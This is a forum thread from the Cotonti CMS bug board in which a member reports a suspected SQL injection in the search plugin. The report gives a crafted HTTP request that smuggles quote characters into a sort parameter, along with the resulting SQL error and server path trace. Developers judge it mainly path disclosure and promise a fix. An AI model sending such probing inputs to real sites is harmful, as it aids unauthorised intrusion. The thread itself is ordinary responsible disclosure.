Foren / Cotonti / Bugs / Search SQL injection

Exploit

badc0re
#1 18. September 2011, 19:14

Members

Hi i want to report a SQL injection.

The request:

Java
1
2
3
4
5
6
7
8
9
10
GET http://localhost/cotonti/index.php?e=search&sq=%5C'%5C'%5C'%5C'%5C'&rs%5Bsetlimit%5D=0&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2010&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2011&rs%5Bsetuser%5D=&rs%5Bpagsub%5D%5B%5D=all&rs%5Bpagtitle%5D=1&rs%5Bpagdesc%5D=1&rs%5Bpagtext%5D=1&rs%5Bpagsort%5D=date&rs%5Bpagsort2%5D=ASC&rs%5Bfrmsub%5D%5B%5D=all&rs%5Bfrmtitle%5D=1&rs%5Bfrmtext%5D=1&rs%5Bfrmsort%5D=updated'INJECTED_PARAM'INJECTED_PARAM&rs%5Bfrmsort2%5D=ASC HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://localhost/cotonti/index.php?e=search&sq=%27%27%27%27%27&rs[setlimit]=0&rs[day]=18&rs[month]=9&rs[year]=2010%271%27&rs[day]=18&rs[month]=9&rs[year]=2011&rs[setuser]=&rs[pagsub][]=all&rs[pagtitle]=1&rs[pagdesc]=1&rs[pagtext]=1&rs[pagsort]=date&rs[pagsort2]=ASC&rs[frmsub][]=all&rs[frmtitle]=1&rs[frmtext]=1&rs[frmsort]=updated&rs[frmsort2]=ASC
Cookie: PHPSESSID=bnq658i0omp7t3u654i85llj51
Content-length: 0
 
 
Result:

2011-09-18 19:03

Java
1
2
3
4
5
6
7
8
9
10
Fatal error: SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause'
 
#0  cot_diefatal(SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause') called at [D:\xampp2\htdocs\cotonti\system\database.php:436]
#1  CotDB->query(SELECT SQL_CALC_FOUND_ROWS p.*, t.*
                FROM cot_forum_posts AS p, cot_forum_topics AS t
                WHERE t.ft_cat IN ('pub','general','offtopic') AND (t.ft_title LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%' OR p.fp_text LIKE '%\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'%') AND p.fp_topicid = t.ft_id
                GROUP BY t.ft_id ORDER BY ft_updatedINJECTED_PARAMINJECTED_PARAM ASC
                LIMIT 0, 50) called at [D:\xampp2\htdocs\cotonti\plugins\search\search.php:367]
#2  include(D:\xampp2\htdocs\cotonti\plugins\search\search.php) called at [D:\xampp2\htdocs\cotonti\system\plugin.php:94]
#3  require_once(D:\xampp2\htdocs\cotonti\system\plugin.php) called at [D:\xampp2\htdocs\cotonti\index.php:92]
 
On version 9.4
esclkm
#2 18. September 2011, 19:36

Team
Thanked: 76 mal

but where was injection??? this field has ALP filter - which filter only [A-Za-z0-z_] try to inject

littledev.ru - мой маленький зарождающийся блог о котонти.
снижение стоимости программирования и снижение стоимости производства разные вещи. Первое можно скорее сравнить с раздачей работникам дешевых инструментов, чем со снижением зарплаты
badc0re
#3 18. September 2011, 21:36

Members

#30749 esclkm:

but where was injection??? this field has ALP filter - which filter only [A-Za-z0-z_] try to inject

 

Added 2 minutes later:

Well the search is vulnerable. Try it by yourself.

Maybe it's not exploitable but it could lead to information extraction.

Dieser Beitrag wurde von badc0re (am 18. September 2011, 21:46, vor 13 Jahre) bearbeitet
Trustmaster
#4 21. September 2011, 07:34

Administrators
Thanked: 265 mal

It is more path disclosure than SQL injection, but thank you for the report!

May the Source be with you!
badc0re
#5 21. September 2011, 10:00

Members

Take a look at 

Java
1
2
3
4
5
6
7
#0  cot_diefatal(SQL error 42S22: Column not found: 1054 Unknown column 'ft_updatedINJECTED_PARAMINJECTED_PARAM' in 'order clause')
 
And
 
GROUP BY t.ft_id ORDER BY ft_updatedINJECTED_PARAMINJECTED_PARAM ASC
 
It looks like sql injection to me.
Trustmaster
#6 21. September 2011, 11:45

Administrators
Thanked: 265 mal

It's a little harm anyways and it'll be fixed in 0.9.5, thank you once again for the report!

May the Source be with you!
badc0re
#7 21. September 2011, 13:07

Members

No problem man.
GHengeveld
#8 22. September 2011, 17:18

Team
Thanked: 52 mal

Actually this isn't really a problem. Production sites should have error reporting disabled, so it won't show the SQL error or backtrace. Nevertheless its good to report these things.